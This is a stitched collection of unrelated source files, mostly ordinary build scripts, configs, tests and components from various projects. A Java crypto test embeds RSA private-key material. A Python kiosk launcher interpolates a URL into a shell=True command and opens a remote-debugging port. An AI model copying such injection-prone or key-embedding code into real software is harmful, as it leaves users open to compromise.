"Ud+Zy3E0RJXToW0t3Eo5UexVieglvpgxG7x1SCdvxYtTl6CZ520=\n" +
"-----END RSA PRIVATE KEY-----\n");
private static final String PRIVATE_KEY_CARRIAGE_RETURN = PRIVATE_KEY.replace('\n', '\r');
private static final String PRIVATE_KEY_CARRIAGE_RETURN_NEWLINE = PRIVATE_KEY.replace("\n", "\r\n");
@SuppressWarnings("SpellCheckingInspection")
private static final String PUBLIC_KEY =
"-----BEGIN PUBLIC KEY-----\n" +
"MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAq2izh7NEarDdrdZLrpli\n" +
"zezZG/JzW14XQ74IXkjEqkvxhZ1s6joGtvoxX+P0QRyWrhgtiUnN3DSRAa0QLsZ0\n" +
"<KEY>0/6eoJGwXSHcLreLEfqdd8+zlvDrbWISekTLoecLttwKSIcP2bcq1\n" +
"<KEY>fHrMOZNLKRYXx3Zx8zsQFf2ee/y\n" +
"<KEY>cOd+pO6hKxff6Q2GVXqHsrI\n" +
"ac4AlR80AEaBeiuFYxjHpruS6BRcyW8UvqX0l9rKMDAWNAtMWt2egYAe6XOEXIWO\n" +
"iQIDAQAB\n" +
"-----END PUBLIC KEY-----\n";
private static final String PUBLIC_KEY_FINGERPRINT = "39:bc:93:66:34:af:e5:15:b4:a1:33:58:81:dc:68:2c";
private static final String PUBLIC_KEY_CARRIAGE_RETURN = PUBLIC_KEY.replace('\n', '\r');
private static final String PUBLIC_KEY_CARRIAGE_RETURN_NEWLINE = PUBLIC_KEY.replace("\n", "\r\n");
private Base64 base64;
private BouncyCastleProvider provider;
private JCECrypto crypto;
private RSAPublicKey rsaPublicKey;
private RSAPrivateKey rsaPrivateKey;
@Before
public void setUp() throws Exception {
base64 = new Base64(0);
provider = new BouncyCastleProvider();
KeyFactory keyFactory = KeyFactory.getInstance("RSA", provider);
PemObject pem = new PemReader(new StringReader(PRIVATE_KEY)).readPemObject();
rsaPrivateKey = (RSAPrivateKey) keyFactory.generatePrivate(new PKCS8EncodedKeySpec(pem.getContent()));
pem = new PemReader(new StringReader(PUBLIC_KEY)).readPemObject();
rsaPublicKey = (RSAPublicKey) keyFactory.generatePublic(new X509EncodedKeySpec(pem.getContent()));
crypto = new JCECrypto(provider);
}
@After
public void tearDown() throws Exception {
base64 = null;
provider = null;
crypto = null;
rsaPublicKey = null;
rsaPrivateKey = null;
rsaPublicKey = null;
}
@Test
public void testDecryptRSA() throws Exception {
String expected = "This is the expected unencrypted value";
@SuppressWarnings("SpellCheckingInspection")
String base64encodedEncrypted =
"<KEY>" +
"<KEY>" +
"<KEY>" +
"<KEY>" +
"9Q6a1Yhav4vBvYouoXRfRwEsiwyZflXfXzgHqA==\n";
String actual = new String(crypto.decryptRSA(base64.decode(base64encodedEncrypted), rsaPrivateKey));
assertEquals(expected, actual);
}
@Test
public void testEncryptRSA() throws Exception {
String expected = "This is the expected unencrypted value";
String actual =
new String(crypto.decryptRSA(crypto.encryptRSA(expected.getBytes(), rsaPublicKey), rsaPrivateKey));
assertEquals(expected, actual);
}
@Test
public void testDecryptAuthTypeDataWithNewLines() throws Exception {
String expected = "{\"auth_request\": \"AuthRequest\", \"action\": \"True\"," +
" \"app_Pins\": \"\", \"device_id\": \"DeviceId\"}";
@SuppressWarnings("SpellCheckingInspection")
String base64encodedEncrypted =
"<KEY>" +
"<KEY>" +
"<KEY>" +
"<KEY>" +
"kTXLdICAqZOuCqYZcU4xdr9Wy/R2tWKOlPm9rw==\n";
String actual = new String(crypto.decryptRSA(base64.decode(base64encodedEncrypted), rsaPrivateKey));
assertEquals(expected, actual);
}
@Test
public void testGetRSAPublicKeyFromPEM() throws Exception {
RSAPublicKey actual = JCECrypto.getRSAPublicKeyFromPEM(provider, PUBLIC_KEY);
assertNotNull(actual);
}
@Test
public void testGetRSAPublicKeyFromPEMCarriageReturn() throws Exception {
RSAPublicKey actual = JCECrypto.getRSAPublicKeyFromPEM(provider, PUBLIC_KEY_CARRIAGE_RETURN);
assertNotNull(actual);
}
@Test
public void testGetRSAPublicKeyFromPEMCarriageReturnNewline() throws Exception {
RSAPublicKey actual = JCECrypto.getRSAPublicKeyFromPEM(provider, PUBLIC_KEY_CARRIAGE_RETURN_NEWLINE);
assertNotNull(actual);
}
@Test
public void testGetRSAPrivateKeyFromPEM() throws Exception {
RSAPrivateKey actual = JCECrypto.getRSAPrivateKeyFromPEM(provider, PRIVATE_KEY);
assertNotNull(actual);
}
@Test
public void testGetRSAPrivateKeyFromPEMCarriageReturn() throws Exception {
RSAPrivateKey actual = JCECrypto.getRSAPrivateKeyFromPEM(provider, PRIVATE_KEY_CARRIAGE_RETURN);
assertNotNull(actual);
}
@Test
public void testGetRSAPrivateKeyFromPEMCarriageReturnNewline() throws Exception {
RSAPrivateKey actual = JCECrypto.getRSAPrivateKeyFromPEM(provider, PRIVATE_KEY_CARRIAGE_RETURN_NEWLINE);
assertNotNull(actual);
}
@Test
public void testSha256() throws Exception {
//noinspection SpellCheckingInspection
String expected = "e806a291cfc3e61f83b98d344ee57e3e8933cccece4fb45e1481f1f560e70eb1";
String actual = Hex.toHexString(crypto.sha256("Testing".getBytes()));
assertEquals(expected, actual);
}
@Test
public void testSha384() throws Exception {
//noinspection SpellCheckingInspection
String expected = "2ca8b7b913d970a884fdb61daf74f6b4f868bc2ac20ea75" +
"83009259f382b14a04be97ea64ba0bab703ca7ea75a932bd5";
String actual = Hex.toHexString(crypto.sha384("Testing".getBytes()));
assertEquals(expected, actual);
}
@Test
public void testSha512() throws Exception {
//noinspection SpellCheckingInspection
String expected = "64f02697ccd1c0ae741d9e226f957127da7a614d6a18f55f9f2726d2027faac1" +
"e95e619dac5417eb4898fd6a9fb8aeb9cdd005e913c80e57454cae4b6fc6e5d6";
String actual = Hex.toHexString(crypto.sha512("Testing".getBytes()));
assertEquals(expected, actual);
}
@Test
public void testGetRsaPublicKeyFingerprintWithPrivateKeyReturnsProperFingerprint() throws Exception {
assertEquals(PUBLIC_KEY_FINGERPRINT, crypto.getRsaPublicKeyFingerprint(rsaPrivateKey));
}
@Test
public void testGetRsaPublicKeyFingerprintWithPublicKeyReturnsProperFingerprint() throws Exception {
assertEquals(PUBLIC_KEY_FINGERPRINT, crypto.getRsaPublicKeyFingerprint(rsaPublicKey));
}
@Test
public void testGetPEMFromPublicKey() throws Exception {
assertEquals(PUBLIC_KEY,
JCECrypto.getPEMFromRSAPublicKey(JCECrypto.getRSAPublicKeyFromPEM(provider, PUBLIC_KEY)));
}
@Test
public void testGetPEMFromPubicKey1024Key() throws Exception {
//noinspection SpellCheckingInspection
final String pem = "-----BEGIN PUBLIC KEY-----\n" +
"<KEY>" +
"sN9nM11H1ajurrZz4ZKCKPG1jdmqvo/tGXvt5mQyvR9WJCg6+uokSfMCAwEAAQ==\n" +
"-----END PUBLIC KEY-----\n";
assertEquals(pem,
JCECrypto.getPEMFromRSAPublicKey(JCECrypto.getRSAPublicKeyFromPEM(provider, pem)));
}
}
|
#!/bin/bash
# Copyright 2014 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# Command for unit test
echo $(basename $0) "$@" | sed "s#/tmp/test_fw\..\{6\}#temp_dir#g"
|
<reponame>philly-d/kustomer-bank-challenge<gh_stars>0
import React from 'react';
import { normalizeAmount } from '../reducers/transactions';
// App header (shows user balance)
const Header = ({ balance }) => {
return (
<div className="content-block">
<div classNamze="column">
<h2 className="ui center aligned header">
Welcome to Banker's Bank!
</h2>
<div className="ui statistic">
<div className="value">
${ normalizeAmount(balance) }
</div>
<div className="label">Your Balance</div>
</div>
</div>
</div>
)
}
export default Header; |
#!/bin/bash
##
## Copyright 2019 International Business Machines
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
verbose=0
snap_card=0
duration="NORMAL"
# Get path of this script
THIS_DIR=$(dirname $(readlink -f "$BASH_SOURCE"))
ACTION_ROOT=$(dirname ${THIS_DIR})
SNAP_ROOT=$(dirname $(dirname ${ACTION_ROOT}))
echo "Starting : $0"
echo "SNAP_ROOT : ${SNAP_ROOT}"
echo "ACTION_ROOT : ${ACTION_ROOT}"
function usage() {
echo "Usage:"
echo " hw_test.sh"
echo " [-C <card>] card to be used for the test"
# echo " [-t <trace_level>]"
# echo " [-duration SHORT/NORMAL/LONG] run tests"
echo
}
while getopts ":C:t:d:h" opt; do
case $opt in
C)
snap_card=$OPTARG;
;;
t)
export SNAP_TRACE=$OPTARG;
;;
d)
duration=$OPTARG;
;;
h)
usage;
exit 0;
;;
\?)
echo "Invalid option: -$OPTARG" >&2
;;
esac
done
export PATH=$PATH:${SNAP_ROOT}/software/tools:${ACTION_ROOT}/sw
####iHELLOWORLD ##########################################################
function test_helloworld {
#cmd="echo \"Hello world. This is my first CAPI SNAP experience. It's real fun.\" > tin"
#echo "cmd: ${cmd}"
#eval ${cmd}
#cmd="echo \"HELLO WORLD. THIS IS MY FIRST CAPI SNAP EXPERIENCE. IT'S REAL FUN.\" > tCAP"
#echo "cmd: ${cmd}"
#eval ${cmd}
echo -n "Doing snap_helloworld "
cmd="snap_helloworld -C${snap_card} -i tin -o tout >> snap_helloworld.log 2>&1"
eval ${cmd}
if [ $? -ne 0 ]; then
cat snap_helloworld.log
echo "cmd: ${cmd}"
echo "failed"
exit 1
fi
echo "ok"
echo -n "Check results ... "
cmp tout tCAP 2>&1 > /dev/null
if [ $? -ne 0 ]; then
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
echo " TEST FAILED !"
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
echo " Out and expected files are different!"
echo "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
exit 1
fi
echo "ok"
}
rm -f snap_helloworld.log
touch snap_helloworld.log
# Whatever duration is, we run the test
# duration is used to run short test in simulation for example
# helloworld is short by nature, so we can ignore duration setting
# if [ "$duration" = "NORMAL" ]; then
test_helloworld
# fi
rm -f *.bin *.bin *.out
echo "------------------------------------------------------"
echo "Test OK"
echo "------------------------------------------------------"
exit 0
|
#!/bin/sh
# This is a generated file; do not edit or check into version control.
export "FLUTTER_ROOT=C:\src\flutter\1.17.4"
export "FLUTTER_APPLICATION_PATH=C:\Users\shafi\AndroidStudioProjects\B2GSoft\Flutter\quick_rider"
export "FLUTTER_TARGET=lib\main.dart"
export "FLUTTER_BUILD_DIR=build"
export "SYMROOT=${SOURCE_ROOT}/../build\ios"
export "OTHER_LDFLAGS=$(inherited) -framework Flutter"
export "FLUTTER_FRAMEWORK_DIR=C:\src\flutter\1.17.4\bin\cache\artifacts\engine\ios"
export "FLUTTER_BUILD_NAME=1.0.0"
export "FLUTTER_BUILD_NUMBER=1"
|
/*
* Copyright OpenSearch Contributors
* SPDX-License-Identifier: Apache-2.0
*/
package com.amazon.dataprepper.plugins.processor.aggregate;
class AggregateGroup implements AggregateActionInput {
private final GroupState groupState;
AggregateGroup() {
this.groupState = new DefaultGroupState();
}
public GroupState getGroupState() {
return groupState;
}
}
|
import requests
import time
API_URL = 'https://example.com/api/'
class HTTPClient:
def __init__(self):
self.s = requests.Session()
self.last_response = None
def send_request(self, endpoint, verify=True):
while True:
try:
if verify:
response = self.s.get(API_URL + endpoint)
else:
response = self.s.get(API_URL + endpoint, verify=verify)
break
except Exception as e:
print('Except on send_request (wait 60 sec and resend): ' + str(e))
time.sleep(60)
if response.status_code == 200:
self.last_response = response |
//
// TTAudioTool.h
// TT
//
// Created by 张福润 on 2017/4/6.
// Copyright © 2017年 张福润. All rights reserved.
//
#import <Foundation/Foundation.h>
typedef void(^ComplitionBlock)(BOOL success, NSString *msg);
@protocol TTAudioToolDelegate <NSObject>
@optional
- (void)audioToolProgress:(float)progress currentTime:(NSTimeInterval)currentTime;
- (void)audioToolPlayCompeted;
@end
@interface TTAudioTool : NSObject
@property (nonatomic, weak) id<TTAudioToolDelegate> delegate;
@property (nonatomic, strong) NSURL *audioPath;
@property (nonatomic, assign, readonly) float progress;
@property (nonatomic, assign, readonly) NSTimeInterval currentTime;
@property (nonatomic, assign, readonly) NSTimeInterval totalTime;
+ (instancetype)shareInstance;
- (void)play;
- (void)playWithBlock:(ComplitionBlock)complition;
- (void)playWithTime:(NSTimeInterval)time;
- (void)pause;
- (void)stop;
@end
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
#
"""
Created on Sat Sep 19 20:55:56 2015
@author: liangshiyu
"""
from __future__ import print_function
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import torch.optim as optim
import torchvision
import torchvision.transforms as transforms
import numpy as np
import time
from scipy import misc
import calMetric as m
import calData as d
#CUDA_DEVICE = 0
start = time.time()
#loading data sets
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((125.3/255, 123.0/255, 113.9/255), (63.0/255, 62.1/255.0, 66.7/255.0)),
])
# loading neural network
# Name of neural networks
# Densenet trained on CIFAR-10: densenet10
# Densenet trained on CIFAR-100: densenet100
# Densenet trained on WideResNet-10: wideresnet10
# Densenet trained on WideResNet-100: wideresnet100
#nnName = "densenet10"
#imName = "Imagenet"
criterion = nn.CrossEntropyLoss()
def recursion_change_bn(module):
if isinstance(module, torch.nn.BatchNorm2d):
module.track_running_stats = 1
else:
for i, (name, module1) in enumerate(module._modules.items()):
module1 = recursion_change_bn(module1)
return module
def test(nnName, dataName, CUDA_DEVICE, epsilon, temperature):
net1 = torch.load("../models/{}.pth".format(nnName))
for i, (name, module) in enumerate(net1._modules.items()):
module = recursion_change_bn(module)
optimizer1 = optim.SGD(net1.parameters(), lr = 0, momentum = 0)
net1.cuda(CUDA_DEVICE)
if dataName != "Uniform" and dataName != "Gaussian":
testsetout = torchvision.datasets.ImageFolder("../data/{}".format(dataName), transform=transform)
testloaderOut = torch.utils.data.DataLoader(testsetout, batch_size=1,
shuffle=False, num_workers=2)
if nnName == "densenet10" or nnName == "wideresnet10":
testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=True, transform=transform)
testloaderIn = torch.utils.data.DataLoader(testset, batch_size=1,
shuffle=False, num_workers=2)
if nnName == "densenet100" or nnName == "wideresnet100":
testset = torchvision.datasets.CIFAR100(root='../data', train=False, download=True, transform=transform)
testloaderIn = torch.utils.data.DataLoader(testset, batch_size=1,
shuffle=False, num_workers=2)
if dataName == "Gaussian":
d.testGaussian(net1, criterion, CUDA_DEVICE, testloaderIn, testloaderIn, nnName, dataName, epsilon, temperature)
m.metric(nnName, dataName)
elif dataName == "Uniform":
d.testUni(net1, criterion, CUDA_DEVICE, testloaderIn, testloaderIn, nnName, dataName, epsilon, temperature)
m.metric(nnName, dataName)
else:
d.testData(net1, criterion, CUDA_DEVICE, testloaderIn, testloaderOut, nnName, dataName, epsilon, temperature)
m.metric(nnName, dataName)
|
<gh_stars>10-100
package capabilities
import (
"github.com/Masterminds/semver"
"github.com/giantswarm/microerror"
)
var couldNotFetchFeatures = µerror.Error{
Kind: "couldNotFetchFeatures",
}
// IsCouldNotFetchFeatures asserts couldNotFetchFeatures.
func IsCouldNotFetchFeatures(err error) bool {
return microerror.Cause(err) == couldNotFetchFeatures
}
var couldNotInitializeCapabilities = µerror.Error{
Kind: "couldNotInitializeCapabilities",
}
// IsCouldNotInitializeCapabilities asserts couldNotInitializeCapabilities.
func IsCouldNotInitializeCapabilities(err error) bool {
return microerror.Cause(err) == couldNotInitializeCapabilities
}
var invalidConfigError = µerror.Error{
Kind: "invalidConfigError",
}
// IsInvalidConfig asserts invalidConfigError.
func IsInvalidConfig(err error) bool {
return microerror.Cause(err) == invalidConfigError
}
// IsInvalidSemVer asserts semver.ErrInvalidSemVer, as semver unfortunately
// does not provide a matcher.
func IsInvalidSemVer(err error) bool {
return microerror.Cause(err) == semver.ErrInvalidSemVer
}
|
#!/bin/bash -eu
set -o pipefail
# Delete old jar
ORIGDIR=${PWD}
BDS_JAR="${ORIGDIR}/build/bds.jar"
BDS_BIN="${ORIGDIR}/build/bds"
rm -f "$BDS_JAR" || true
# Make sure 'bin' dir exists
mkdir bin || true
# Build Jar file
echo Building JAR file
ant
# Build go program
echo
echo Building bds wrapper: Compiling GO program
cd go/bds/
export GOPATH=`pwd`
go clean
go build
go fmt
# Build binay (go executable + JAR file)
cat bds "$BDS_JAR" > "$BDS_BIN"
chmod a+x "$BDS_BIN"
echo "Bds executable: '$BDS_BIN'"
# Remove JAR file
rm "$BDS_JAR"
cd -
|
<filename>cmd/cmd.go
package cmd
import (
"fmt"
"log"
"os"
"strings"
"github.com/dutchcoders/transfer.sh/server"
"github.com/fatih/color"
"github.com/minio/cli"
"google.golang.org/api/googleapi"
)
var Version = "0.1"
var helpTemplate = `NAME:
{{.Name}} - {{.Usage}}
DESCRIPTION:
{{.Description}}
USAGE:
{{.Name}} {{if .Flags}}[flags] {{end}}command{{if .Flags}}{{end}} [arguments...]
COMMANDS:
{{range .Commands}}{{join .Names ", "}}{{ "\t" }}{{.Usage}}
{{end}}{{if .Flags}}
FLAGS:
{{range .Flags}}{{.}}
{{end}}{{end}}
VERSION:
` + Version +
`{{ "\n"}}`
var globalFlags = []cli.Flag{
cli.StringFlag{
Name: "listener",
Usage: "127.0.0.1:8080",
Value: "127.0.0.1:8080",
},
// redirect to https?
// hostnames
cli.StringFlag{
Name: "profile-listener",
Usage: "127.0.0.1:6060",
Value: "",
},
cli.BoolFlag{
Name: "force-https",
Usage: "",
},
cli.StringFlag{
Name: "tls-listener",
Usage: "127.0.0.1:8443",
Value: "",
},
cli.BoolFlag{
Name: "tls-listener-only",
Usage: "",
},
cli.StringFlag{
Name: "tls-cert-file",
Value: "",
},
cli.StringFlag{
Name: "tls-private-key",
Value: "",
},
cli.StringFlag{
Name: "temp-path",
Usage: "path to temp files",
Value: os.TempDir(),
},
cli.StringFlag{
Name: "web-path",
Usage: "path to static web files",
Value: "",
},
cli.StringFlag{
Name: "proxy-path",
Usage: "path prefix when service is run behind a proxy",
Value: "",
},
cli.StringFlag{
Name: "ga-key",
Usage: "key for google analytics (front end)",
Value: "",
},
cli.StringFlag{
Name: "uservoice-key",
Usage: "key for user voice (front end)",
Value: "",
},
cli.StringFlag{
Name: "provider",
Usage: "s3|gdrive|local",
Value: "",
},
cli.StringFlag{
Name: "s3-endpoint",
Usage: "",
Value: "http://s3-eu-west-1.amazonaws.com",
EnvVar: "S3_ENDPOINT",
},
cli.StringFlag{
Name: "aws-access-key",
Usage: "",
Value: "",
EnvVar: "AWS_ACCESS_KEY",
},
cli.StringFlag{
Name: "aws-secret-key",
Usage: "",
Value: "",
EnvVar: "AWS_SECRET_KEY",
},
cli.StringFlag{
Name: "bucket",
Usage: "",
Value: "",
EnvVar: "BUCKET",
},
cli.BoolFlag{
Name: "s3-no-multipart",
Usage: "Disables S3 Multipart Puts",
},
cli.StringFlag{
Name: "gdrive-client-json-filepath",
Usage: "",
Value: "",
},
cli.StringFlag{
Name: "gdrive-local-config-path",
Usage: "",
Value: "",
},
cli.IntFlag{
Name: "gdrive-chunk-size",
Usage: "",
Value: googleapi.DefaultUploadChunkSize / 1024 / 1024,
},
cli.IntFlag{
Name: "rate-limit",
Usage: "requests per minute",
Value: 0,
EnvVar: "",
},
cli.StringFlag{
Name: "lets-encrypt-hosts",
Usage: "host1, host2",
Value: "",
EnvVar: "HOSTS",
},
cli.StringFlag{
Name: "log",
Usage: "/var/log/transfersh.log",
Value: "",
},
cli.StringFlag{
Name: "basedir",
Usage: "path to storage",
Value: "",
},
cli.StringFlag{
Name: "clamav-host",
Usage: "clamav-host",
Value: "",
EnvVar: "CLAMAV_HOST",
},
cli.StringFlag{
Name: "virustotal-key",
Usage: "virustotal-key",
Value: "",
EnvVar: "VIRUSTOTAL_KEY",
},
cli.BoolFlag{
Name: "profiler",
Usage: "enable profiling",
},
cli.StringFlag{
Name: "http-auth-user",
Usage: "user for http basic auth",
Value: "",
},
cli.StringFlag{
Name: "http-auth-pass",
Usage: "pass for http basic auth",
Value: "",
},
cli.StringFlag{
Name: "ip-whitelist",
Usage: "comma separated list of ips allowed to connect to the service",
Value: "",
},
cli.StringFlag{
Name: "ip-blacklist",
Usage: "comma separated list of ips not allowed to connect to the service",
Value: "",
},
}
type Cmd struct {
*cli.App
}
func VersionAction(c *cli.Context) {
fmt.Println(color.YellowString(fmt.Sprintf("transfer.sh: Easy file sharing from the command line")))
}
func New() *Cmd {
logger := log.New(os.Stdout, "[transfer.sh]", log.LstdFlags)
app := cli.NewApp()
app.Name = "transfer.sh"
app.Author = ""
app.Usage = "transfer.sh"
app.Description = `Easy file sharing from the command line`
app.Flags = globalFlags
app.CustomAppHelpTemplate = helpTemplate
app.Commands = []cli.Command{
{
Name: "version",
Action: VersionAction,
},
}
app.Before = func(c *cli.Context) error {
return nil
}
app.Action = func(c *cli.Context) {
options := []server.OptionFn{}
if v := c.String("listener"); v != "" {
options = append(options, server.Listener(v))
}
if v := c.String("tls-listener"); v == "" {
} else if c.Bool("tls-listener-only") {
options = append(options, server.TLSListener(v, true))
} else {
options = append(options, server.TLSListener(v, false))
}
if v := c.String("profile-listener"); v != "" {
options = append(options, server.ProfileListener(v))
}
if v := c.String("web-path"); v != "" {
options = append(options, server.WebPath(v))
}
if v := c.String("proxy-path"); v != "" {
options = append(options, server.ProxyPath(v))
}
if v := c.String("ga-key"); v != "" {
options = append(options, server.GoogleAnalytics(v))
}
if v := c.String("uservoice-key"); v != "" {
options = append(options, server.UserVoice(v))
}
if v := c.String("temp-path"); v != "" {
options = append(options, server.TempPath(v))
}
if v := c.String("log"); v != "" {
options = append(options, server.LogFile(logger, v))
} else {
options = append(options, server.Logger(logger))
}
if v := c.String("lets-encrypt-hosts"); v != "" {
options = append(options, server.UseLetsEncrypt(strings.Split(v, ",")))
}
if v := c.String("virustotal-key"); v != "" {
options = append(options, server.VirustotalKey(v))
}
if v := c.String("clamav-host"); v != "" {
options = append(options, server.ClamavHost(v))
}
if v := c.Int("rate-limit"); v > 0 {
options = append(options, server.RateLimit(v))
}
if cert := c.String("tls-cert-file"); cert == "" {
} else if pk := c.String("tls-private-key"); pk == "" {
} else {
options = append(options, server.TLSConfig(cert, pk))
}
if c.Bool("profiler") {
options = append(options, server.EnableProfiler())
}
if c.Bool("force-https") {
options = append(options, server.ForceHTTPs())
}
if httpAuthUser := c.String("http-auth-user"); httpAuthUser == "" {
} else if httpAuthPass := c.String("http-auth-pass"); httpAuthPass == "" {
} else {
options = append(options, server.HttpAuthCredentials(httpAuthUser, httpAuthPass))
}
applyIPFilter := false
ipFilterOptions := server.IPFilterOptions{}
if ipWhitelist := c.String("ip-whitelist"); ipWhitelist != "" {
applyIPFilter = true
ipFilterOptions.AllowedIPs = strings.Split(ipWhitelist, ",")
ipFilterOptions.BlockByDefault = true
}
if ipBlacklist := c.String("ip-blacklist"); ipBlacklist != "" {
applyIPFilter = true
ipFilterOptions.BlockedIPs = strings.Split(ipBlacklist, ",")
}
if applyIPFilter {
options = append(options, server.FilterOptions(ipFilterOptions))
}
switch provider := c.String("provider"); provider {
case "s3":
if accessKey := c.String("aws-access-key"); accessKey == "" {
panic("access-key not set.")
} else if secretKey := c.String("aws-secret-key"); secretKey == "" {
panic("secret-key not set.")
} else if bucket := c.String("bucket"); bucket == "" {
panic("bucket not set.")
} else if storage, err := server.NewS3Storage(accessKey, secretKey, bucket, c.String("s3-endpoint"), logger, c.Bool("s3-no-multipart")); err != nil {
panic(err)
} else {
options = append(options, server.UseStorage(storage))
}
case "gdrive":
chunkSize := c.Int("gdrive-chunk-size")
if clientJsonFilepath := c.String("gdrive-client-json-filepath"); clientJsonFilepath == "" {
panic("client-json-filepath not set.")
} else if localConfigPath := c.String("gdrive-local-config-path"); localConfigPath == "" {
panic("local-config-path not set.")
} else if basedir := c.String("basedir"); basedir == "" {
panic("basedir not set.")
} else if storage, err := server.NewGDriveStorage(clientJsonFilepath, localConfigPath, basedir, chunkSize, logger); err != nil {
panic(err)
} else {
options = append(options, server.UseStorage(storage))
}
case "local":
if v := c.String("basedir"); v == "" {
panic("basedir not set.")
} else if storage, err := server.NewLocalStorage(v, logger); err != nil {
panic(err)
} else {
options = append(options, server.UseStorage(storage))
}
default:
panic("Provider not set or invalid.")
}
srvr, err := server.New(
options...,
)
if err != nil {
logger.Println(color.RedString("Error starting server: %s", err.Error()))
return
}
srvr.Run()
}
return &Cmd{
App: app,
}
}
|
import subprocess
def launch_chromium_kiosk(screen_width, screen_height, url):
command = f"/usr/bin/chromium/chrome --window-size={screen_width},{screen_height} -remote-debugging-port=9999 --kiosk {url}"
subprocess.run(command, shell=True)
# Example usage
launch_chromium_kiosk(1920, 1080, "https://example.com") |
<filename>src/state/ReduxWrapper.js
/* eslint-disable react/display-name */
import React from 'react';
import { Provider } from 'react-redux';
import {
createStore,
applyMiddleware,
compose,
} from 'redux';
import createSagaMiddleware from 'redux-saga';
import appReducer from './reducers';
import rootSaga from './sagas';
import { initClient } from '../lib/api';
let composeEnhancer = compose
if (typeof window !== 'undefined' && window) {
initClient()
composeEnhancer = window.__REDUX_DEVTOOLS_EXTENSION_COMPOSE__ || compose;
}
const sagaMiddleware = createSagaMiddleware();
const rootReducer = (state, action) => {
if (action.type === 'USER_LOGOUT') {
state = undefined;
}
return appReducer(state, action)
}
const store = createStore(
rootReducer,
composeEnhancer(
applyMiddleware(sagaMiddleware),
)
)
sagaMiddleware.run(rootSaga);
export default ({ element }) => (
<Provider store={store}>{element}</Provider>
);
|
const webpack = require('webpack');
const path = require('path');
const UglifyJsPlugin = require('uglifyjs-webpack-plugin');
const VueLoaderPlugin = require('vue-loader/lib/plugin');
const HtmlWebpackPlugin = require('html-webpack-plugin');
const isPro = () => {
return process.env.NODE_ENV = 'production';
};
const config = {
mode: isPro() ? 'production' : 'development',
entry: ['babel-polyfill', './src/dev-entry/dev.js'],
output: {
path: path.resolve(__dirname, 'dist'),
filename: 'shadow.[hash:5].js',
publicPath: '/'
},
plugins: [
new UglifyJsPlugin({
include: /\/src/,
exclude: /\/node_modules/,
uglifyOptions: {
ecma: 5,
sourceMap: false,
beautify: false,
warnings: false
}
}),
new VueLoaderPlugin(),
new webpack.NamedModulesPlugin(),
new webpack.HotModuleReplacementPlugin(),
new HtmlWebpackPlugin({
template: 'src/template/index.html'
})
],
module: {
rules: [
{
test: /\.js$/,
exclude: /(node_modules|bower_components)/,
use: {
loader: 'babel-loader',
options: {
presets: ['es2015'],
}
}
},
{
test: /\.vue$/,
use: {
loader: 'vue-loader',
options: {
loaders: {
scss: [
{
loader: 'vue-style-loader'
},
{
loader: 'css-loader'
},
{
loader: 'sass-loader'
}
]
}
}
}
},
{
test: /\.(less|css)$/,
use: [{
loader: 'style-loader' // creates style nodes from JS strings
}, {
loader: 'css-loader' // translates CSS into CommonJS
}, {
loader: 'less-loader' // compiles Less to CSS
}]
},
{
test: /\.(png|jpg|gif|mp4|ogv)$/,
use: [
{
loader: 'file-loader',
options: {}
}
]
},
{
test: /\.(html)$/,
use: {
loader: 'html-loader',
options: {
attrs: [':data-src']
}
}
}
]
},
resolve: {
extensions: ['.js', '.vue', '.json'],
alias: {
'vue$': 'vue/dist/vue.esm.js',
'@': path.resolve('src')
}
},
devtool: 'source-map',
context: __dirname,
devServer: {
// host: '192.168.1.106',
host: '0.0.0.0',
contentBase: path.join(__dirname, 'dist'), // boolean | string | array, static file location
// contentBase: path.join(__dirname, 'static'), // boolean | string | array, static file location
compress: true, // enable gzip compression
historyApiFallback: true, // true for index.html upon 404, object for multiple paths
hot: true, // hot module replacement. Depends on HotModuleReplacementPlugin
https: false, // true for self-signed, object for cert authority
noInfo: true // only errors & warns on hot reload
}
};
module.exports = config; |
import { TestBed, ComponentFixture } from '@angular/core/testing';
import { FilterEventTwoComponent } from 'path-to-filter-event-two-component'; // Replace with the actual path
describe('FilterEventTwoComponent', () => {
let fixture: ComponentFixture<FilterEventTwoComponent>;
let component: FilterEventTwoComponent;
beforeEach(() => {
TestBed.configureTestingModule({
declarations: [FilterEventTwoComponent]
});
fixture = TestBed.createComponent(FilterEventTwoComponent);
component = fixture.componentInstance;
fixture.detectChanges();
});
it('should create', () => {
expect(component).toBeTruthy();
});
}); |
package net.kardexo.kardexotools.tasks;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.HashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import net.kardexo.kardexotools.KardExo;
import net.kardexo.kardexotools.property.BaseAccess;
import net.kardexo.kardexotools.property.Property;
import net.kardexo.kardexotools.property.PropertyOwner;
import net.minecraft.Util;
import net.minecraft.network.chat.Component;
import net.minecraft.network.chat.TextComponent;
import net.minecraft.network.chat.TranslatableComponent;
import net.minecraft.server.MinecraftServer;
import net.minecraft.server.level.ServerPlayer;
public class TickableBases implements Runnable
{
private static final Map<Property, Set<String>> BASE_VISITORS = new HashMap<Property, Set<String>>();
private final MinecraftServer server;
public TickableBases(MinecraftServer dedicatedserver)
{
this.server = dedicatedserver;
}
@Override
public void run()
{
for(Property base : KardExo.BASES.values())
{
List<PropertyOwner> notifyList = new ArrayList<PropertyOwner>();
for(PropertyOwner owner : base.getAllOwners())
{
if(owner.doNotify())
{
